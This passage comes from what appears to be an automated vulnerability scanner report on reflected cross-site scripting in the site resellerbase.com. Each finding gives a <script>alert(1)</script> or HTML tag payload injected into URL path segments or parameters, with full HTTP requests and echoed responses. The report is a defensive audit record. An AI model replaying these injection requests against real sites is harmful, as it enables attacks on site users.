<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/3half.gif?59440<script>alert(1)</script>75c30174560=1 was not found on this server.</p>
...[SNIP]...

2.5022. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c9b17<script>alert(1)</script>aaaaff739b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicec9b17<script>alert(1)</script>aaaaff739b3/domain-names/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicec9b17<script>alert(1)</script>aaaaff739b3/domain-names/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5023. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bf693<script>alert(1)</script>a00318231db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-namesbf693<script>alert(1)</script>a00318231db/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-namesbf693<script>alert(1)</script>a00318231db/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5024. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b0ab7<script>alert(1)</script>ca6a890f4c1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themesb0ab7<script>alert(1)</script>ca6a890f4c1/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themesb0ab7<script>alert(1)</script>ca6a890f4c1/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5025. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f44a8<script>alert(1)</script>049191ac76d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmosf44a8<script>alert(1)</script>049191ac76d/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmosf44a8<script>alert(1)</script>049191ac76d/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5026. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d5278<script>alert(1)</script>8b7a8f8bf23 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/imagesd5278<script>alert(1)</script>8b7a8f8bf23/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/imagesd5278<script>alert(1)</script>8b7a8f8bf23/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5027. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1cc6a<script>alert(1)</script>fd88c351b58 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating1cc6a<script>alert(1)</script>fd88c351b58/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating1cc6a<script>alert(1)</script>fd88c351b58/4half.gif was not found on this server.</p>
...[SNIP]...

2.5028. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 91196<script>alert(1)</script>4084a01f859 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/4half.gif91196<script>alert(1)</script>4084a01f859 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/4half.gif91196<script>alert(1)</script>4084a01f859 was not found on this server.</p>
...[SNIP]...

2.5029. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e7740<script>alert(1)</script>13bc604d02f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/4half.gif?e7740<script>alert(1)</script>13bc604d02f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/4half.gif?e7740<script>alert(1)</script>13bc604d02f=1 was not found on this server.</p>
...[SNIP]...

2.5030. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e366b<script>alert(1)</script>8bd7bc214e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicee366b<script>alert(1)</script>8bd7bc214e0/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicee366b<script>alert(1)</script>8bd7bc214e0/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5031. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 20b15<script>alert(1)</script>d9a97bba1e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names20b15<script>alert(1)</script>d9a97bba1e5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names20b15<script>alert(1)</script>d9a97bba1e5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5032. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 644c0<script>alert(1)</script>199051a3fd2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes644c0<script>alert(1)</script>199051a3fd2/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes644c0<script>alert(1)</script>199051a3fd2/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5033. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 73005<script>alert(1)</script>2488baee5ac was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos73005<script>alert(1)</script>2488baee5ac/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos73005<script>alert(1)</script>2488baee5ac/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5034. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e15c3<script>alert(1)</script>d89a724811 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/imagese15c3<script>alert(1)</script>d89a724811/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/imagese15c3<script>alert(1)</script>d89a724811/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5035. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload daf8c<script>alert(1)</script>95a5b316dc1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/ratingdaf8c<script>alert(1)</script>95a5b316dc1/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/ratingdaf8c<script>alert(1)</script>95a5b316dc1/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5036. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 55483<script>alert(1)</script>d166c3a5a8d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/search.php55483<script>alert(1)</script>d166c3a5a8d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/search.php55483<script>alert(1)</script>d166c3a5a8d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5037. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 88295<a>f2577e9d880 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search88295<a>f2577e9d880&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search88295<a>f2577e9d880&opt=2 was not found on this server.</p>
...[SNIP]...

2.5038. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c45bf<a>e067c7c9de1 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...c45bf<a>e067c7c9de1&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...c45bf<a>e067c7c9de1&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5039. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7c5d5<script>alert(1)</script>ee24d96d979 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&7c5d5<script>alert(1)</script>ee24d96d979=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
